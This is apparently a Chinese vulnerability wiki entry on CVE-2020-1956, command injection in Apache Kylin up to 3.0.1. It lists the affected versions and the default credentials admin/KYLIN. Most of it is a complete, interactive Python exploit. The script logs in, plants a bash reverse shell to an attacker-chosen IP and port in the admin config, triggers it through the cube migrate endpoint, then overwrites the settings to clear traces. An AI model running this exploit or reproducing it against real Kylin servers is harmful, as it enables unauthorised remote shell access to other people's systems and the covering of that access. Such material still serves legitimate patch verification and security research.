影响版本
Apache Kylin 2.3.0 ~ 2.3.2；Apache Kylin 2.4.0 ~ 2.4.1；Apache Kylin 2.5.0 ~ 2.5.2；Apache Kylin 2.6.0 ~ 2.6.5；Apache Kylin 3.0.0-alpha、3.0.0-alpha2、3.0.0-beta、3.0.0、3.0.1
打开 Kylin Web 界面后使用默认账号密码登录，出现初始界面即说明默认凭据仍然可用。注意：本漏洞的利用需要管理员权限（下方 PoC 通过 /kylin/api/admin/config 修改系统配置），因此能以管理员身份登录是利用的前提条件，而不是漏洞本身。
admin/KYLIN
POC
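#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
#
# CVE-2020-1956 - Apache Kylin (<= 3.0.1) command injection through the
# cube auto-migrate tool. The flow implemented below is:
#
#   1. POC_1  logs in with HTTP Basic auth against
#             /kylin/api/user/authentication and keeps the JSESSIONID cookie.
#   2. POC_2  rewrites the three "kylin.tool.auto-migrate-cube.*" settings
#             through PUT /kylin/api/admin/config, placing a bash reverse
#             shell one-liner in the "src-config" value.
#   3. POC_3  POSTs to the cube "migrate" endpoint, which (per the original
#             PoC) makes the server run the planted command.
#   4. POC_4  overwrites the same three settings with placeholder values.
#
# Operational caveats for testers:
#   * This is an AUTHENTICATED exploit: /kylin/api/admin/config is an admin
#     endpoint, so the credentials supplied to POC_1 need that role (the wiki
#     text relies on the default admin/KYLIN).
#   * The config changes are persistent server-side state. POC_4 does NOT
#     restore the pre-exploit values; it writes fixed placeholders. Record the
#     original values first if a clean rollback is required.
#   * POC_3 targets the sample cube "kylin_sales_cube" in project "learn_kylin"
#     by default; pass cube=/project= when the target has no sample data.
#   * The migrate request is sent without a timeout on purpose (as in the
#     original); it may not return until the reverse shell is closed.
#     Cleanup now runs in a finally block so Ctrl-C still triggers it.
import base64
import json
import sys

import requests

# Browser-like User-Agent sent on every request (unchanged from the original).
USER_AGENT = (
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
)

# The three settings rewritten by POC_2 / POC_4. Value tuples passed to
# _set_config() must follow this order.
MIGRATE_KEYS = (
    "kylin.tool.auto-migrate-cube.enabled",
    "kylin.tool.auto-migrate-cube.src-config",
    "kylin.tool.auto-migrate-cube.dest-config",
)

# Timeout (seconds) for the short API calls (login / config writes).
TIMEOUT = 20


def title():
    """Print the banner and usage hints."""
    print('+------------------------------------------')
    print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
    print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
    print('+ \033[34m公众号 : PeiQi文库 \033[0m')
    print('+ \033[34mVersion: Apache Kylin <= 3.0.1 \033[0m')
    print('+ \033[36m使用格式: python3 CVE-2020-1956 \033[0m')
    print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:7070 \033[0m')
    print('+ \033[36mLogin >>> admin:KYLIN(格式为User:Pass) \033[0m')
    print('+------------------------------------------')


def _url(target_url, path):
    """Join the user-supplied base URL and an API path, tolerating a trailing '/'."""
    return target_url.rstrip("/") + path


def _basic_auth(user_pass):
    """Return the value of the Authorization header for a 'user:pass' string."""
    return "Basic " + base64.b64encode(user_pass.encode("utf-8")).decode("utf-8")


def _reverse_shell(IP, PORT):
    """Bash reverse-shell one-liner that POC_2 plants in the src-config value."""
    return "echo;bash -i >& /dev/tcp/{}/{} 0>&1;echo".format(IP, PORT)


def _config_payload(key, value):
    """JSON body for PUT /kylin/api/admin/config.

    json.dumps escapes quotes and backslashes correctly; for the plain ASCII
    values used here it yields exactly the '{"key":"...","value":"..."}' shape
    the original hand-built %-format string produced.
    """
    return json.dumps({"key": key, "value": value}, separators=(",", ":"))


def _headers(cookie=None, Authorization=None, json_body=False):
    """Build the request headers used by the PoC.

    The insertion order matches the header order of the original script
    (User-Agent, Authorization, [Accept, Content-Type, Pragma], Cookie).
    The Authorization header is omitted when no value is supplied.
    """
    headers = {"User-Agent": USER_AGENT}
    if Authorization is not None:
        headers["Authorization"] = Authorization
    if json_body:
        headers["Accept"] = "application/json, text/plain, */*"
        headers["Content-Type"] = "application/json;charset=UTF-8"
        headers["Pragma"] = "no-cache"
    headers["Cookie"] = "project=null" if cookie is None else "project=null;JSESSIONID=" + cookie
    return headers


def _set_config(target_url, cookie, Authorization, values):
    """PUT one (key, value) pair per MIGRATE_KEYS entry to the admin config endpoint.

    Exits the process on the first non-200 response or transport error,
    mirroring the fail-fast behaviour of the original POC_2 / POC_4 loops.
    """
    config_url = _url(target_url, "/kylin/api/admin/config")
    headers = _headers(cookie, Authorization, json_body=True)
    for key, value in zip(MIGRATE_KEYS, values):
        data = _config_payload(key, value)
        try:
            response = requests.put(url=config_url, headers=headers, data=data, timeout=TIMEOUT)
        except requests.RequestException:
            print("\033[31mx 漏洞利用失败 \033[0m")
            sys.exit(0)
        if response.status_code == 200:
            print("\033[32mo 成功将" + key + "设置为" + value + "\033[0m")
        else:
            print("\033[31mx 设置" + key + "为" + value + "失败\033[0m")
            sys.exit(0)


def POC_1(target_url):
    """Log in with Basic auth; return (JSESSIONID, Authorization header value).

    Prompts for 'user:pass' on stdin. Exits the process when the request
    fails, when the response body lacks "password" (the original PoC's
    success criterion) or when no JSESSIONID cookie was set.
    """
    login_url = _url(target_url, "/kylin/api/user/authentication")
    user_pass = str(input("\033[35mPlease input User and Pass\nLogin >>> \033[0m"))
    Authorization = _basic_auth(user_pass)
    try:
        response = requests.post(url=login_url, headers=_headers(None, Authorization), timeout=TIMEOUT)
    except requests.RequestException:
        print("\033[31mx 漏洞利用失败\033[0m")
        sys.exit(0)
    # The original bare `except:` also swallowed SystemExit/KeyError here and
    # printed a misleading second message; the checks now live outside the try.
    if "password" not in response.text or "JSESSIONID" not in response.cookies:
        print("\033[31mx 账号密码出现错误 \033[0m")
        sys.exit(0)
    session_id = response.cookies["JSESSIONID"]
    print("\033[32mo 成功登录,获得JSESSIONID:" + session_id + "\033[0m")
    return session_id, Authorization


def POC_2(target_url, cookie, IP, PORT, Authorization):
    """Plant the reverse-shell command in the auto-migrate-cube settings.

    Writes enabled="true", src-config=<bash reverse shell to IP:PORT> and
    dest-config="shell", exactly the values of the original PoC. How the
    server turns src-config into a command is outside this script.
    """
    values = ("true", _reverse_shell(IP, PORT), "shell")
    _set_config(target_url, cookie, Authorization, values)


def POC_3(target_url, cookie, Authorization=None, cube="kylin_sales_cube", project="learn_kylin"):
    """Trigger the cube migration (runs the planted command), then clean up.

    cube/project default to the Kylin sample data the original PoC hard-coded.
    The migrate request is sent without a timeout, as in the original; POC_4
    is always attempted afterwards, even when the request errors out or is
    interrupted, so the planted command is not left behind by accident.
    """
    print("\033[35mo 正在反弹shell......\033[0m")
    vuln_url = _url(target_url, "/kylin/api/cubes/{}/{}/migrate".format(cube, project))
    failed = False
    try:
        requests.post(url=vuln_url, headers=_headers(cookie))
    except requests.RequestException:
        print("\033[31mx 漏洞利用失败 \033[0m")
        failed = True
    finally:
        POC_4(target_url, cookie, Authorization)
    if failed:
        sys.exit(0)


def POC_4(target_url, cookie, Authorization=None):
    """Overwrite the three auto-migrate-cube settings with placeholder values.

    NOTE: this does not restore whatever was configured before POC_2 ran; it
    writes "false" / "echo;echo;echo" / "None". (The original script sent the
    typo "flase" for the enabled flag.)
    """
    if Authorization is None:
        # The original read this name from module scope (set by the __main__
        # block); keep that fallback for callers that still omit the argument.
        Authorization = globals().get("Authorization")
    _set_config(target_url, cookie, Authorization, ("false", "echo;echo;echo", "None"))
    print("\033[35mo 成功清理痕迹\033[0m")


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    # POC_1 handles its own failures and exits; the original try/except here
    # only caught that SystemExit and printed a second, misleading message.
    cookie, Authorization = POC_1(target_url)
    IP = str(input("\033[35m请输入监听IP >>> \033[0m"))
    PORT = str(input("\033[35m请输入监听PORT >>> \033[0m"))
    POC_2(target_url, cookie, IP, PORT, Authorization)
    POC_3(target_url, cookie, Authorization)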